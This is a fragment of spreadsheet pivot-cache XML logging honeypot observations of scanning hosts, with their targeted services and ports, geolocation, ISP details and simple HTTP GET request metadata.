    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_SSH_H12&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H43&amp;&amp;SMA-LAB_TELNET_H34"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;14544&amp;&amp;23&amp;&amp;9100&amp;&amp;53330&amp;&amp;49998&amp;&amp;50014&amp;&amp;50058&amp;&amp;50033"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="1994-03-19 05:00:00"/>
    <s v="2028-03-20 04:00:00"/>
    <s v="2024-10-16 01:20:34"/>
    <s v="['ANS1.HINET.NET', 'ANS2.HINET.NET', 'ANS3.HINET.TW']"/>
    <s v="Net-Chinese Co., Ltd."/>
    <s v="['clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited']"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="2"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:3b7e:fcd2"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3872"/>
    <x v="3872"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T01:28:49"/>
    <d v="2025-04-01T01:20:33"/>
    <d v="2025-04-01T01:28:49"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75cc:a4ea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3873"/>
    <x v="3873"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T01:28:10"/>
    <d v="2024-08-29T01:00:48"/>
    <d v="2025-04-01T01:28:10"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_SSH_H5&amp;&amp;SMA-LAB_LDAP_HC1"/>
    <s v="22&amp;&amp;389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PE"/>
    <s v="Pernambuco"/>
    <s v="Olinda"/>
    <s v="Olinda"/>
    <s v="3393536"/>
    <s v="NA"/>
    <s v="-8.00889"/>
    <s v="-34.8553"/>
    <s v="262713"/>
    <s v="LIDERI TELECOM"/>
    <s v="Lideri Telecom"/>
    <s v="business"/>
    <s v="Lideri Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_LDAP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bad0:66f"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3874"/>
    <x v="3874"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T01:21:04"/>
    <d v="2025-04-01T01:19:44"/>
    <d v="2025-04-01T01:21:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="HE"/>
    <s v="Hesse"/>
    <s v="Regierungsbezirk Darmstadt"/>
    <s v="Frankfurt am Main"/>
    <s v="2925533"/>
    <s v="60313"/>
    <s v="50.1109"/>
    <s v="8.68213"/>
    <s v="39486"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="HostRoyale Technologies Pvt Ltd"/>
    <s v="hosting"/>
    <s v="NA"/>
    <s v="2019-07-26"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d86:4f77"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3875"/>
    <x v="3875"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T01:10:27"/>
    <d v="2025-03-31T15:55:36"/>
    <d v="2025-04-01T01:10:27"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f3:fe33"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3876"/>
    <x v="3876"/>
    <s v="218-161-62-168.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T00:39:54"/>
    <d v="2023-12-23T06:44:34"/>
    <d v="2025-04-01T00:39:54"/>
    <n v="561"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SOCKS5_H44&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1080&amp;&amp;15506&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:3ea8"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3877"/>
    <x v="3877"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T00:25:13"/>
    <d v="2025-04-01T00:25:13"/>
    <d v="2025-04-01T00:25:13"/>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s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75ca:8bdc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3878"/>
    <x v="3878"/>
    <s v="NA&amp;&amp;218-161-88-124.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T00:10:12"/>
    <d v="2024-09-09T12:22:00"/>
    <d v="2025-04-01T00:10:12"/>
    <n v="526"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H31"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;62910&amp;&amp;23&amp;&amp;80&amp;&amp;NA&amp;&amp;9100&amp;&amp;43125&amp;&amp;43150&amp;&amp;43187"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;GET&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:587c"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3879"/>
    <x v="3879"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T00:08:46"/>
    <d v="2025-04-01T00:08:46"/>
    <d v="2025-04-01T00:08:46"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (RajajiNagar)"/>
    <s v="1277333"/>
    <s v="560010"/>
    <s v="13.0123"/>
    <s v="77.5558"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="Quadgen WiFi Project C/O Addl GM P3 Bangalore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5c:bf71"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3880"/>
    <x v="3880"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T00:02:40"/>
    <d v="2025-03-31T20:12:17"/>
    <d v="2025-04-01T00:02:40"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_POSTGRES_HC1"/>
    <s v="5432&amp;&amp;1080"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="26"/>
    <s v="Thừa Thiên Huế Province"/>
    <s v="Thành Phố Huế"/>
    <s v="Huế"/>
    <s v="1580240"/>
    <s v="NA"/>
    <s v="16.4619"/>
    <s v="107.595"/>
    <s v="7552"/>
    <s v="Viettel Group"/>
    <s v="Viettel Corporation"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-05-21"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7502:b176"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>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8D2830D-80A6-49F4-A890-78B3FCC8217A}"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3885" firstHeaderRow="1" firstDataRow="1" firstDataCol="1"/>
  <pivotFields count="64">
    <pivotField axis="axisRow" showAll="0">
      <items count="3882">
        <item x="3865"/>
        <item x="2659"/>
        <item x="292"/>
        <item x="2664"/>
        <item x="542"/>
        <item x="710"/>
        <item x="2607"/>
        <item x="3384"/>
        <item x="2927"/>
        <item x="2539"/>
        <item x="3370"/>
        <item x="2531"/>
        <item x="326"/>
        <item x="3080"/>
        <item x="750"/>
        <item x="772"/>
        <item x="193"/>
        <item x="3005"/>
        <item x="2725"/>
        <item x="1379"/>
        <item x="1363"/>
        <item x="1951"/>
        <item x="2679"/>
        <item x="2088"/>
        <item x="303"/>
        <item x="3240"/>
        <item x="1836"/>
        <item x="2420"/>
        <item x="2625"/>
        <item x="1744"/>
        <item x="2608"/>
        <item x="1410"/>
        <item x="2855"/>
        <item x="328"/>
        <item x="1019"/>
        <item x="3712"/>
        <item x="2991"/>
        <item x="2122"/>
        <item x="449"/>
        <item x="200"/>
        <item x="1440"/>
        <item x="1956"/>
        <item x="2988"/>
        <item x="2729"/>
        <item x="3776"/>
        <item x="3329"/>
        <item x="1127"/>
        <item x="2285"/>
        <item x="1011"/>
        <item x="3498"/>
        <item x="3711"/>
        <item x="339"/>
        <item x="2195"/>
        <item x="1854"/>
        <item x="1285"/>
        <item x="1443"/>
        <item x="3246"/>
        <item x="3783"/>
        <item x="2611"/>
        <item x="3359"/>
        <item x="3096"/>
        <item x="3642"/>
        <item x="995"/>
        <item x="740"/>
        <item x="2817"/>
        <item x="2"/>
        <item x="1547"/>
        <item x="699"/>
        <item x="230"/>
        <item x="2789"/>
        <item x="637"/>
        <item x="986"/>
        <item x="1106"/>
        <item x="1389"/>
        <item x="1689"/>
        <item x="421"/>
        <item x="541"/>
        <item x="94"/>
        <item x="445"/>
        <item x="1189"/>
        <item x="2784"/>
        <item x="700"/>
        <item x="3451"/>
        <item x="849"/>
        <item x="1108"/>
        <item x="1195"/>
        <item x="2167"/>
        <item x="2094"/>
        <item x="315"/>
        <item x="1697"/>
        <item x="3679"/>
        <item x="3512"/>
        <item x="36"/>
        <item x="3848"/>
        <item x="2875"/>
        <item x="2249"/>
        <item x="876"/>
        <item x="2326"/>
        <item x="2843"/>
        <item x="2385"/>
        <item x="3820"/>
        <item x="2066"/>
        <item x="2854"/>
        <item x="2916"/>
        <item x="974"/>
        <item x="2405"/>
        <item x="2493"/>
        <item x="2587"/>
        <item x="1558"/>
        <item x="1040"/>
        <item x="1583"/>
        <item x="945"/>
        <item x="127"/>
        <item x="3349"/>
        <item x="3515"/>
        <item x="2178"/>
        <item x="3247"/>
        <item x="280"/>
        <item x="1893"/>
        <item x="3790"/>
        <item x="3038"/>
        <item x="3050"/>
        <item x="3681"/>
        <item x="2244"/>
        <item x="1908"/>
        <item x="3809"/>
        <item x="2247"/>
        <item x="1263"/>
        <item x="1193"/>
        <item x="1404"/>
        <item x="3855"/>
        <item x="887"/>
        <item x="2648"/>
        <item x="3722"/>
        <item x="3767"/>
        <item x="20"/>
        <item x="188"/>
        <item x="1938"/>
        <item x="2376"/>
        <item x="1957"/>
        <item x="3242"/>
        <item x="2939"/>
        <item x="2681"/>
        <item x="663"/>
        <item x="1896"/>
        <item x="2867"/>
        <item x="1064"/>
        <item x="2238"/>
        <item x="2363"/>
        <item x="1340"/>
        <item x="2008"/>
        <item x="1198"/>
        <item x="1691"/>
        <item x="2940"/>
        <item x="1059"/>
        <item x="217"/>
        <item x="299"/>
        <item x="3104"/>
        <item x="1178"/>
        <item x="3049"/>
        <item x="2073"/>
        <item x="3615"/>
        <item x="532"/>
        <item x="3244"/>
        <item x="3685"/>
        <item x="1080"/>
        <item x="79"/>
        <item x="1170"/>
        <item x="3828"/>
        <item x="203"/>
        <item x="314"/>
        <item x="2877"/>
        <item x="2968"/>
        <item x="702"/>
        <item x="2837"/>
        <item x="2200"/>
        <item x="3199"/>
        <item x="2003"/>
        <item x="1167"/>
        <item x="943"/>
        <item x="708"/>
        <item x="696"/>
        <item x="2746"/>
        <item x="3703"/>
        <item x="3115"/>
        <item x="630"/>
        <item x="2869"/>
        <item x="3693"/>
        <item x="3279"/>
        <item x="1091"/>
        <item x="2391"/>
        <item x="305"/>
        <item x="2985"/>
        <item x="3550"/>
        <item x="733"/>
        <item x="3432"/>
        <item x="3223"/>
        <item x="3490"/>
        <item x="10"/>
        <item x="3639"/>
        <item x="2053"/>
        <item x="1392"/>
        <item x="1424"/>
        <item x="2042"/>
        <item x="718"/>
        <item x="2166"/>
        <item x="1584"/>
        <item x="976"/>
        <item x="749"/>
        <item x="768"/>
        <item x="1520"/>
        <item x="1110"/>
        <item x="3391"/>
        <item x="85"/>
        <item x="2574"/>
        <item x="2180"/>
        <item x="2024"/>
        <item x="321"/>
        <item x="903"/>
        <item x="978"/>
        <item x="2999"/>
        <item x="3060"/>
        <item x="1470"/>
        <item x="1436"/>
        <item x="513"/>
        <item x="2327"/>
        <item x="2524"/>
        <item x="1800"/>
        <item x="3864"/>
        <item x="1386"/>
        <item x="1802"/>
        <item x="288"/>
        <item x="2377"/>
        <item x="687"/>
        <item x="1944"/>
        <item x="2510"/>
        <item x="410"/>
        <item x="3785"/>
        <item x="923"/>
        <item x="472"/>
        <item x="2242"/>
        <item x="657"/>
        <item x="3143"/>
        <item x="3436"/>
        <item x="379"/>
        <item x="1601"/>
        <item x="3255"/>
        <item x="3568"/>
        <item x="2595"/>
        <item x="1746"/>
        <item x="1070"/>
        <item x="3746"/>
        <item x="155"/>
        <item x="3296"/>
        <item x="746"/>
        <item x="16"/>
        <item x="1838"/>
        <item x="3139"/>
        <item x="861"/>
        <item x="516"/>
        <item x="1456"/>
        <item x="81"/>
        <item x="2098"/>
        <item x="3307"/>
